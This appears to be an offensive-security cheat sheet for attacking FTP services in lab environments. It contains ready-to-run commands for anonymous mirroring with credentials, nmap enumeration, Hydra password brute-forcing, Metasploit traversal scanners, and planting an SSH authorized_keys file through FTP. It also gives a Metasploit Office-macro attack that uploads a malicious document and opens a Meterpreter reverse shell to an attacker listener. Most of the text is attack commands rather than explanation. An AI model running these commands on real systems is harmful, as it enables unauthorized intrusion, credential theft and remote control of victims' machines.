FTP 21
checklist
Anonymous login
OS version
Other software: Check
Program Files
,yum.log
,/bin
Password files
DLLs: Use for msfpescan / BOF targets
Upload potential: Do you have the ability to upload files?
Can you trigger execution of uploads?
Swap binaries
Public exploits: Check for any public exploits for FTP server software
Download All Directories and Files
Mirror FTP directories with anonymous login:
wget --mirror 'ftp://ftp_user:redcliff@10.10.10.59'
If PASV transfer is disabled:
wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
If PASV is enabled:
bashCopy codesudo wget --mirror 'ftp://anonymous:anonymous@10.11.1.14'
FTP Information Gathering
Grab FTP Banner via telnet:
telnet -n 192.168.101.100 21
Grab FTP Certificate if available:
openssl s_client -connect 192.168.101.100:21 -starttls ftp
Nmap FTP scan:
Scan FTP with scripts:
nmap --script ftp-* -p 21 192.168.101.100
Basic FTP scan with version detection:
nmap -sC -sV 192.168.101.162 --script=ftp-anon
Alternative (without brute forcing):
nmap -p 21 --script="+ftp and not brute and not dos and not fuzzer" -vv -oN ftp > $ip
Connect with Browser:
ftp://anonymous:anonymous@192.168.101.100
Brute Force FTP Login
Hydra Brute Force (Need Username):
hydra -t 1 -l motherfucker -P rockyou.txt -vV 192.168.101.100 ftp
Hydra with Sparta custom list (Requires Sparta tool):
hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f > $ip ftp
Msfconsole FTP scanning:
msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
SSH Key Deployment via FTP
Generate SSH key:
ssh-keygen
Upload SSH key via FTP:
ftp 10.10.10.10 anonymous:anonymous put /root/.ssh/id_rsa.pub authorized_keys
SSH into target:
ssh user@10.10.10.10
FTP Passive Mode Detection
Passive mode at login: Indicates potential presence of a firewall in the system.
Exploiting MS Office Evil Macros
First Stage: Set up Reverse Shell
Search for Office macro:
msfconsole --→ search office macro use /multi/fileformat/office_word_macro
Set up Meterpreter reverse listener:
set payload windows/meterpreter/reverse_tcp set lhost 192.168.119.177 set disablepayloadhandler false run
Second Stage: Upload and Execute Macro
Change file extension:
sudo mv msf.docm msf.doc
Start Meterpreter listener:
set payload windows/meterpreter/reverse_tcp set exitonsession false set lhost 192.168.119.177 set lport 4444 run -j
Upload via FTP:
ftp 10.10.10.10 21 put msf.doc exit
Catch Meterpreter session.
Last updated